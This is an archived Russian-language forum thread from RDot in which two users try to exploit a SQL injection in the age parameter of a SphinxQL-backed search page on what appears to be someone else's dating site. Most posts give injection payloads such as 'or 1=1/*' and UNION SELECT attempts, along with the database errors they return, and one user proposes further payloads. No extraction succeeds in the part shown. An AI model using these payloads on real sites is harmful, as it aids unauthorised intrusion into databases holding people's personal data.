RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Сервисы, БД, Серверы/Network services, Databases, Servers (https://rdot.org/forum/forumdisplay.php?f=23)
-   -   Скул на SphinXQL (https://rdot.org/forum/showthread.php?t=3785)

YuNi|[c 20.09.2016 03:30

Скул на SphinXQL
 
привет народ.
Нашел интересный скул если можно назвать таковым.
Там ошибка от SphinXQL.
Пробовал крутит со всеми методами и для всех СУБД но помогло.
Гуглил но тоже ничего не помогло. Мб кто сталкивался с этой конструцией запросов?

привер таков:
Код:

xttp://site.com/search?a[ageFrom]=18'&a[ageTo]=90&param1=value1.....paramN=value=N
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected $undefined, expecting $end near '' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

xttp://site.com/search?a[ageFrom]=18''&a[ageTo]=90&param1=value1.....paramN=value=N
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, expecting $end near ''' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18'' AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

раньше тоже встречал один и тогда просто забил на него

Прошу совета

profexer 20.09.2016 15:56

Незакрытый комментарий вызывает ошибку?

YuNi|[c 20.09.2016 18:55

Цитата:

Сообщение от profexer (Сообщение 40429)
Незакрытый комментарий вызывает ошибку?

на /* идет без ошибки и на ;%00 тоже
вот на OR или AND реагирует по разному:
Код:

xttp://site.com/search?a[ageFrom]=18 or 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected OR, expecting $end near 'or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

xttp://site.com/search?a[ageFrom]=18 and 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected CONST_INT, expecting IDENT (or 97 other tokens) near '1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

xttp://site.com/search?a[ageFrom]=18' and 456='456;%00&a[ageTo]=90&param1=value1.....paramN=value=N
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, expecting $end near '' and 456='456;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18' and 456='456; AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;


profexer 20.09.2016 20:07

Там не нужна кавычка, зачем ты ее туда постоянно суешь?
Если незакрытый комментарий проходит, то просто правильно закончи запрос
Цитата:

18 AND id_user=-1 UNION SELECT 1, 2/*

YuNi|[c 20.09.2016 23:46

Цитата:

Сообщение от profexer (Сообщение 40432)
Там не нужна кавычка, зачем ты ее туда постоянно суешь?
Если незакрытый комментарий проходит, то просто правильно закончи запрос

Код:

a[ageFrom]=18 AND id_user=-1 UNION SELECT 1,2/*
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND id_user=-1 UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

a[ageFrom]=18 AND id_user=-1 UNION SELECT 1,2;%00
Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND id_user=-1 UNION SELECT 1,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;


смог limit изменит, выводит 2 результата анкет:
Код:

a[ageFrom]=18 AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 10,2/*
Но это не то. Нельзя выводит нужные данные. Только без ошибки но с меньшим лимитом

profexer 21.09.2016 00:14

Я не знаком с SphinXQL, так что будем тыкать пальцем.
Попробуй так:
Цитата:

18 AND is_online=-1 UNION SELECT 1, 2 LIMIT 0,1/*
Цитата:

18 AND `id_user`=-1 UNION SELECT 1, 2 LIMIT 0,1/*
Цитата:

18 AND `id_user`=-1 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,1/*

YuNi|[c 21.09.2016 00:26

ладно забейте, думаю Sphinxql не крутится спасибо profexer

profexer 21.09.2016 01:11

Ну почему же не крутиться? Думаю очень даже крутиться, просто нужно реально разобраться как.

YuNi|[c 21.09.2016 01:26

Цитата:

Сообщение от profexer (Сообщение 40439)
Ну почему же не крутиться? Думаю очень даже крутиться, просто нужно реально разобраться как.

ответы с разными вариантами постил, уже незнаю что пробовать дальше.
сфинкс просто игнорит мои добавленные запросы.

profexer 21.09.2016 01:30

Может он вовсе и не игнорит? Если нет ошибки, то где-то же выводится id пользователя (в ссылке или например его имя, по которому можно получить id) или наоборот вся инфа пропадает.


Часовой пояс GMT +3, время: 21:55.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot